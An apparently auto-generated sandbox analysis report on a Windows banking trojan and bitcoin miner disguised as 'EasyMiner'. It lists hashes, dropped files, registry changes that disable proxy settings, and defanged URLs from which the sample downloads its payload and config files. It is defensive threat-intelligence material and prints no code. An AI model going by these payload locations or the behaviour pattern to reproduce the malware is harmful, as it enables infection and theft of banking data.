Trojan-Banker.Win32.Brasil_be2f0391e8

by malwarelabrobot on July 22nd, 2017 in Malware Descriptions.

Gen:Variant.Application.BitCoinMiner.45 (BitDefender), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6494 (DrWeb), Gen:Variant.Application.BitCoinMiner.45 (B) (Emsisoft), Artemis!BE2F0391E89B (McAfee), Trojan.Gen.2 (Symantec), Trojan.Win32.BitMiner (Ikarus), Gen:Variant.Application.BitCoinMiner (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericIRCBot.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, VirTool, IRCBot, Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: be2f0391e89b078af5e7958fce4d0905
SHA1: ba349b8313a31eee220f481d8b8029fd6284f819
SHA256: 1b7f21c58abecba7a9ff66259c676c38f8db72c06f40962ac54ecbe5eb95ea45
SSDeep: 49152:SORFo/iIvrTHBhx98w6HBs08P0b4ISp08P0b4ISU0c:SOH0FSm984ISp984ISm
Size: 5406720 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphiv60v70_v2, ACProtect141, BorlandDelphi30, UPolyXv05_v6, MicrosoftWindowsShortcutfile
Company: Naleci
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7 SP1 32-bit

Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

Behaviour	Description
IRCBot	A bot can communicate with command and control servers via IRC channel.

Process activity

The Trojan-Banker creates the following process(es):

%original file name%.exe:3404
temp0a0.exe:2136

The Trojan-Banker injects its code into the following process(es):

%original file name%.exe:796

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:796 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

C:\wallet.7z (803 bytes)
C:\settings.xml (2 bytes)
C:\web.xml (65 bytes)
C:\Log\Easyminer_Log_21Jul2017_1806.txt (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\wallet[1].7z (378001 bytes)
C:\be2f0391e89b078af5e7958fce4d0905.ini (72 bytes)

The Trojan-Banker deletes the following file(s):

C:\temp0a0.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\wallet[1].7z (0 bytes)

The process %original file name%.exe:3404 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

C:\runminer.bat (21 bytes)
C:\temp0a0.exe (732 bytes)
C:\wallet.7z (803 bytes)
C:\settings.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\updt[1].zip (2502767 bytes)
C:\EasyMiner.exe.manifest (654 bytes)
C:\web.xml (65 bytes)
C:\runwallet.bat (23 bytes)
C:\be2f0391e89b078af5e7958fce4d0905.ini (641 bytes)
C:\Log\Easyminer_Log_21Jul2017_1805.txt (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\wallet[1].7z (378001 bytes)

The process temp0a0.exe:2136 makes changes in the file system.
The Trojan-Banker creates and/or writes to the following file(s):

C:\%original file name%.exe (732 bytes)
C:\temp0a0.ini (497 bytes)
C:\Log\Easyminer_Log_21Jul2017_1806.txt (384 bytes)

The Trojan-Banker deletes the following file(s):

C:\%original file name%.exe (0 bytes)

Registry activity

The process %original file name%.exe:796 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

"UNCAsIntranet" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:3404 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\be2f0391e89b078af5e7958fce4d0905_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker deletes the following value(s) in system registry:

The process temp0a0.exe:2136 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Banker deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5	File path
d4aa6af9f71f5f9049c95b5abbeea56d	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\updt[1].zip
d4aa6af9f71f5f9049c95b5abbeea56d	c:\%original file name%.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Open Radio Directory
Product Name: EasyMiner
Product Version: 1.0.0.2
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 0.1.0.34
File Description: EasyMiner
Comments:
Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
CODE	4096	1429996	1430016	4.53882	33213acf92a7f1b8863d7e6ec37b33be
DATA	1437696	39344	39424	4.081	bf153f56ec3c685a97b41f68db88fece
BSS	1478656	16105	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	1495040	13738	13824	3.5115	bcea377a78d24151a6a0278efd57aa45
.tls	1511424	24	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	1515520	24	512	0.142404	60769ad54021c84731b65ca1e7e03128
.reloc	1519616	99788	99840	4.62031	64708ed18d6dd9023842d1ccc72d8411
.rsrc	1622016	3822080	3822080	3.0852	90f16ae1d3c180aed9767038c130d07f

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://lotusulalb2.ro/easyminer/wallet.7z	89.42.223.49
hxxp://lotusulalb2.ro/easyminer/ip.php	89.42.223.49
hxxp://lotusulalb2.ro/easyminer/registrar.txt	89.42.223.49
hxxp://lotusulalb2.ro/easyminer/settings.xml	89.42.223.49
hxxp://lotusulalb2.ro/	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/css/iabootstrap.css?fm=1492603357	89.42.223.49
hxxp://lotusulalb2.ro/modules/eu_cookie/templates/front/css/divascookies.css?fm=1488863722	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img/icon-sliders.png	89.42.223.49
hxxp://lotusulalb2.ro/uploads/site_logo.png	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img/1.png	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/css/user-style.css?fm=1492463567	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img//mountains.jpg	89.42.223.49
hxxp://lotusulalb2.ro/cron/?764	89.42.223.49
hxxp://lotusulalb2.ro/js/jquery/jquery.js?fm=1491181282	89.42.223.49
hxxp://lotusulalb2.ro/js/intelli/intelli.js?fm=1491181282	89.42.223.49
hxxp://lotusulalb2.ro/tmp/cache/intelli.config.en.js?fm=1499849052	89.42.223.49
hxxp://lotusulalb2.ro/js/intelli/intelli.minmax.js?fm=1491181282	89.42.223.49
hxxp://lotusulalb2.ro/js/frontend/footer.js?fm=1498878551	89.42.223.49
hxxp://lotusulalb2.ro/tmp/cache/intelli.lang.en.js?fm=1499849052	89.42.223.49
hxxp://lotusulalb2.ro/js/bootstrap/js/bootstrap.min.js?fm=1491181282	89.42.223.49
hxxp://lotusulalb2.ro/modules/fancybox/js/jquery.fancybox.pack.js?fm=1491181282	89.42.223.49
hxxp://googleadapis.l.google.com/css?family=Open Sans:400,400i,700,700i,800&subset=cyrillic
hxxp://lotusulalb2.ro/modules/eu_cookie/js/frontend/jquery.divascookies-0.3.min.js?fm=1488863716	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/js/app.js?fm=1492463572	89.42.223.49
hxxp://lotusulalb2.ro/modules/fancybox/js/jquery.fancybox.css?fm=1491181282	89.42.223.49
hxxp://lotusulalb2.ro/modules/eu_cookie/templates/front/css/divascookies_style_dark_bottom.css?fm=1488863724	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img/icon-monitor.png	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img/icon-browser.png	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/fonts/fontawesome-webfont.eot?	89.42.223.49
hxxp://gstaticadssl.l.google.com/s/opensans/v14/PRmiXeptR36kaC0GEAetxlRROVH9Vvc8xHnAGvvgPQc.woff
hxxp://gstaticadssl.l.google.com/s/opensans/v14/RjgO7rYTmqiVp7vzi-Q5UT8E0i7KZn-EPnyo3HZu7kw.woff
hxxp://gstaticadssl.l.google.com/s/opensans/v14/EInbV5DfGHOiMmvb1Xr-horaN7vELC11_xip9Rz-hMs.woff
hxxp://gstaticadssl.l.google.com/s/opensans/v14/xjAJXh38I15wypJXxuGMBmOb2gHztoQeulij-1lvl-8.woff
hxxp://gstaticadssl.l.google.com/s/opensans/v14/k3k702ZOKiLJc3WVjuplzIraN7vELC11_xip9Rz-hMs.woff
hxxp://lotusulalb2.ro/templates/kickstart/img/bg-header-3.jpg	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img/dot3.png	89.42.223.49
hxxp://lotusulalb2.ro/templates/kickstart/img/bg-section-features.jpg	89.42.223.49
hxxp://46-105-201-240.any.cdn.anycast.me/js15_as.js
hxxp://s4.histats.com/stats/0.php?3635752&@f16&@g1&@h1&@i1&@j1500649540706&@k0&@l1&@mHome Mining cryptocoins made the easy way&@n0&@o1000&@q0&@r0&@s0&@ten-us&@u1276&@vhttp://easyminer.net/&@w	184.173.167.98
hxxp://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=http://easyminer.net/&j=	107.182.231.45
hxxp://e.dtscout.com/idg/	107.182.231.45
hxxp://elb-tse-01-1047733575.eu-west-1.elb.amazonaws.com/5/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF
hxxp://ps.eyeota.net/pixel?pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://elb-tse-01-1047733575.eu-west-1.elb.amazonaws.com/5/ct=y/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF
hxxp://ps.eyeota.net/pixel/bounce/?pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://tags.phx.bluekai.com/site/27675?id=2DE7B66B4518725926432CB1022296DF&ret=html&phint=__bk_t=Home Mining cryptocoins made the easy way&phint=__bk_k=&phint=__bk_l=http://easyminer.net/&r=13133386
hxxp://pagead.l.doubleclick.net/pixel?google_nid=eye&google_cm&google_sc&bid=gdo9o51&newuser=1
hxxp://ib.anycast.adnxs.com/getuid?http://ps.eyeota.net/match?uid=$UID&bid=2cr76e1
hxxp://userdblb.tubemogul.com/upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu
hxxp://ttd-euwest-match-adsrvr-org-139334178.eu-west-1.elb.amazonaws.c/track/cmf/generic?ttd_pid=eyeota&ttd_tpi=1
hxxp://track-eu.adformnet.akadns.net/serving/cookie/match/?party=1009
hxxp://ps.eyeota.net/match?bid=gdo9o51&newuser=1&google_gid=CAESEH0HDPTF3KGEcV-FDyOM0zI&google_cver=1	35.156.76.213
hxxp://track-eu.adformnet.akadns.net/serving/cookie/match/?CC=1&party=1009
hxxp://ttd-euwest-match-adsrvr-org-139334178.eu-west-1.elb.amazonaws.c/track/cmb/generic?ttd_pid=eyeota&ttd_tpi=1
hxxp://ib.anycast.adnxs.com/bounce?/getuid?http%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D%24UID%26bid%3D2cr76e1
hxxp://userdblb.tubemogul.com/ct/upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu&_test=WXIYRgAAAGbcCHPP
hxxp://ps.eyeota.net/match?uid=5968840930698789580&bid=9gdtmu1	35.156.76.213
hxxp://ps.eyeota.net/match?uid=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&bid=1e2n4ou	35.156.76.213
hxxp://ps.eyeota.net/match?uid=6436859416475074122&bid=2cr76e1	35.156.76.213
hxxp://tags.phx.bluekai.com/site/27675?dt=0&r=1573727964&sig=1370858844&bkca=KJhBM1WvQp91CoIZcG5B m3CClPm5 ApiBm0aZtPsCiIdKJBYcdIM8ewEhgSjtVD1ADobygvOkuOXe90OTOs PtVnskcRzAt80woFFd1wxkLUtry9FvlMp8IrRpotsQ5Ph2loMO188UzZUqReNbdTqCvjojzKVatHJF9rTYm8lynw o6i8SRLbxkuAuLNH2GNekr
hxxp://ps.eyeota.net/match?uid=WXIYRgAAAGbcCHPP&bid=0rijhbu	35.156.76.213
hxxp://lotusulalb2.ro/uploads/site_favicon.ico	89.42.223.49
hxxp://ps.eyeota.net/pixel?e_rc=1&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://pixel-origin.mathtag.com/sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]
hxxp://dxedge-prod-lb-404808087.eu-central-1.elb.amazonaws.com/ping_match.gif?st=EYEOTA&rurl=http://ps.eyeota.net/match?bid=9sn4omv&uid=_wfivefivec_&newuser=1
hxxp://euirlzdiprd-external-915864222.eu-west-1.elb.amazonaws.com/GenericUserSync.ashx?dpid=42
hxxp://d.turn.com.akadns.net/r/dd/id/L2NzaWQvMS9jaWQvMjg0NTA1NDYvdC8w/url/hxxp://ps.eyeota.net/match?bid=1mpjpn0&turn_id=$!{TURN_UUID}&newuser=1	46.228.164.13
hxxp://ps.eyeota.net/match?bid=9sn4omv&uid=Ru2Z2hPj1DyzuX5&newuser=1	35.156.76.213
hxxp://pixel-origin.mathtag.com/sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]&mm_bnc&mm_bct
hxxp://ps.eyeota.net/match?bid=2crn9e1&uid=b251d362-2acd-4970-85f4-3b4fcf2264c8	35.156.76.213
hxxp://ps.eyeota.net/match?bid=1mpjpn0&turn_id=2489555661493901901&newuser=1	35.156.76.213
hxxp://ps.eyeota.net/match?bid=7vi0rg0&uid=aa6a5972-184b-4000-aa4d-0096e5ec7490	35.156.76.213
hxxp://us-east-1-prod-inapp-alb-252761888.us-east-1.elb.amazonaws.com/insync?vxii_pid=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0
hxxp://us-east-1-prod-inapp-alb-252761888.us-east-1.elb.amazonaws.com/insync?vxii_pid=12&vxii_rcid=6e04aa6a-78bd-4ddc-a7ef-3c5e57d34ffb&vxii_pid1=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://ps.eyeota.net/pixel?e_rc=2&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com/ibs:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID}
hxxp://a-tm.rfihub.com/cm?pub=24472&in=1
hxxp://pixel.tapad.com/idsync/ex/receive?partner_id=2376&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&partner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID}&bid=6bnoi0v
hxxp://dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com/demconf.jpg?et:ibs\|data:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID}
hxxp://ps.eyeota.net/match?uid=639581525868801423&bid=omt9pi0	35.156.76.213
hxxp://log-zone-c-251829089.us-east-1.elb.amazonaws.com/eyeota_user_sync
hxxp://pixel.tapad.com/idsync/ex/receive/check?partner_id=2376&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&partner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID}&bid=6bnoi0v
hxxp://ps.eyeota.net/match?bid=6j5b2cv&uid=00702949223008346980439587358349708598	35.156.76.213
hxxp://ttd-euwest-match-adsrvr-org-139334178.eu-west-1.elb.amazonaws.c/track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=%2Chttp%3A%2F%2Fps.eyeota.net%2Fmatch%3Fuid%3D16918e61-6e26-11e7-8451-005056a24356%26bid%3D6bnoi0v
hxxp://pixel.tapad.com/idsync/ex/receive?partner_id=1830&partner_device_id=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&ttd_puid=,http://ps.eyeota.net/match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v
hxxp://ams01-login-ds.dotomi.com/eyeota/match?nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20
hxxp://ams01-login-ds.dotomi.com/eyeota/match?dtm_test=27c7cceb86980571&nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20
hxxp://ps.eyeota.net/match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v	35.156.76.213
hxxp://ps.eyeota.net/match?bid=r8d1b20	35.156.76.213
hxxp://log-zone-b-422164977.us-east-1.elb.amazonaws.com/eyeota_user_sync?
hxxp://lotusulalb2.ro/easyminer/updt.zip	89.42.223.49
hxxp://ps.eyeota.net/match?bid=6bib2cv&uid=EUX6387533831706967011	35.156.76.213
hxxp://ocsp.godaddy.com.akadns.net//MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1+30c7dH4b0W1Ws3NcQwg6piOcCAzkUhA==
hxxp://ps.eyeota.net/pixel?e_rc=3&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://tags.phx.bluekai.com/site/29539?limit=1&id=2Mo5g13cxp1RQR_Y0XPNVnAI1Fexng56KcfA9OuNEbrM
hxxp://spcms-global.pbp.gysm.yahoodns.net/cms?partner_id=Eyeot
hxxp://evn-eu-477788133.eu-west-1.elb.amazonaws.com/getuid?url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}
hxxp://ec2-54-194-53-18.eu-west-1.compute.amazonaws.com/match.gif?id=2Zs8eaBuCCVvYgNeWPi-feg-4rhBqXrmhi07KILu_SLQ&partner=eyeota&RED=http://ps.eyeota.net/match?bid=652b2cv&uid=
hxxp://ml314.com/utsync.ashx?eid=50052&et=0&fp=2fTntY3H6YOSxIf_wdSMCfygOSDFrDPHL7c44QyB2zlI&return=http://ps.eyeota.net/match?bid=r8hrb20&uid=nil	34.251.148.123
hxxp://evn-eu-477788133.eu-west-1.elb.amazonaws.com/getuid?bounce=true&url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}
hxxp://ps.eyeota.net/match?bid=r8hrb20&uid=nil	35.156.76.213
hxxp://ps.eyeota.net/match?bid=652b2cv&uid=fca3253dec2b4551ac13309d	35.156.76.213
hxxp://ps.eyeota.net/match?bid=b2c3gb0&uid=005297fc-ec97-47a0-a704-4984e8b602f2	35.156.76.213
hxxp://ocsp.godaddy.com.akadns.net//MEIwQDA+MDwwOjAJBgUrDgMCGgUABBQUwPiEZQ6/sVZNPaFToNfxx8ZwqAQUfAwyH6fZMH/EfWijYqihzqsHWycCAQc=
hxxp://ps.eyeota.net/pixel?e_rc=4&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://f2.shared.global.fastly.net/sg/eyeota/1/cm
hxxp://rs.gwallet.com/r1/pixel/x31662	208.146.36.221
hxxp://aa.agkn.com/adscores/g.pixel?sid=9202273308&_puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&_redir=http://ps.eyeota.net/match?bid=c9gd69u&uid=	54.72.169.137
hxxp://ps.eyeota.net/match?bid=1mpf4m0&uid=b0a91725-996e-4077-8f53-f9ad0312c26b-tuct6b9dda	35.156.76.213
hxxp://2waycm-geo.netmng.com/cm/?rd=http://ps.eyeota.net/match?bid=6bmpi0v&uid={UUID}
hxxp://rp.gwallet.com/r1/cm/p58	208.146.36.220
hxxp://tag-terraform-elb-1437920109.eu-central-1.elb.amazonaws.com/pixel/1716/?che=1500649562&sk=164460302393000363526&puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&as2=&l1=http://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363526
hxxp://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363526	35.156.76.213
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI=	178.255.83.1
hxxp://e5631.b.akamaiedge.net/issuers/STCA.crt
hxxp://ps.eyeota.net/pixel?e_rc=5&pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF	35.156.76.213
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69+Aj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc=	178.255.83.1
hxxp://a1213.g.akamai.net/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQ1mI4Ww4R5LZiQ295pj4OF/44yyAQUyk7dWyc1Kdn27sPlU++kwBmWHa8CEQCSuHRPcc7Q4mxyo9jV2SWy
hxxp://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR64T7ooMQqLLQoy+emBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEEEVCOlPdt2vCNZMypqho4I=	178.255.83.1
hxxp://a1213.g.akamai.net//MFQwUjBQME4wTDAJBgUrDgMCGgUABBRKUAJ27jxxuy1zYtpUHfLy0MHHugQUys4dGAN3HhzzfFiymnCoCIAW9K4CEwarM81FRJBKpx5TRPzrMY8Wu/M=
hxxp://crl.comodoca.com.cdn.cloudflare.net/COMODORSADomainValidationSecureServerCA.crl	104.16.93.188
hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt
hxxp://s4.histats.com/stats/e.php?3635752&@Ab&@R34189&@w	184.173.167.98
hxxp://tags.phx.bluekai.com/site/27675?id=2DE7B66B4518725926432CB1022296DF&ret=html&phint=__bk_t=Home Mining cryptocoins made the easy way&phint=__bk_k=&phint=__bk_l=http://easyminer.net/&r=46412811
hxxp://get35.com/m/id.gif?uim_s=DTS&uim_k=71129f02efc51faa&uim_id=2DE7B66B4518725926432CB1022296DF	206.54.177.233
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/YHKj6JjF6UBieQioTYpFsuEriQQUtnf6aUhHn1MS1cLqBzJ2B9GXBxkCEGmHlBnZ42JwdJ275Z3GaF4=
hxxp://a1363.dscg.akamai.net/pki/crl/products/MicCodSigPCA_08-31-2010.crl
hxxp://i.w55c.net/ping_match.gif?st=EYEOTA&rurl=http://ps.eyeota.net/match?bid=9sn4omv&uid=_wfivefivec_&newuser=1	35.157.233.74
hxxp://easyminer.net/templates/kickstart/img/dot3.png	89.42.223.49
hxxp://d.agkn.com/pixel/1716/?che=1500649562&sk=164460302393000363526&puid=2FkFccuDUa0A4ZWrijR8aa74S-BqpAqQaRc13j1-G5-U&as2=&l1=http://ps.eyeota.net/match?bid=c9gd69u&uid=164460302393000363526	35.156.23.61
hxxp://easyminer.net/templates/kickstart/js/app.js?fm=1492463572	89.42.223.49
hxxp://easyminer.net/	89.42.223.49
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab	62.140.236.163
hxxp://sync.mathtag.com/sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]&mm_bnc&mm_bct	185.29.135.226
hxxp://eyeota-sync.dotomi.com/eyeota/match?dtm_test=27c7cceb86980571&nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20	63.215.202.140
hxxp://sync.adaptv.advertising.com/eyeota_user_sync?	52.5.223.23
hxxp://in.v12group.com/insync?vxii_pid=10005&vxii_pdid=2jTZLW4H_a54aWUznu9Vl2uyo57lJEyRlBY79U4BScZ0	34.194.0.60
hxxp://fonts.gstatic.com/s/opensans/v14/RjgO7rYTmqiVp7vzi-Q5UT8E0i7KZn-EPnyo3HZu7kw.woff	172.217.18.67
hxxp://ocsp.trustwave.com//MFQwUjBQME4wTDAJBgUrDgMCGgUABBRKUAJ27jxxuy1zYtpUHfLy0MHHugQUys4dGAN3HhzzfFiymnCoCIAW9K4CEwarM81FRJBKpx5TRPzrMY8Wu/M=	62.140.236.154
hxxp://bcp.crwdcntrl.net/5/ct=y/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF	52.208.215.251
hxxp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl	104.16.93.188
hxxp://easyminer.net/modules/eu_cookie/js/frontend/jquery.divascookies-0.3.min.js?fm=1488863716	89.42.223.49
hxxp://fonts.gstatic.com/s/opensans/v14/xjAJXh38I15wypJXxuGMBmOb2gHztoQeulij-1lvl-8.woff	172.217.18.67
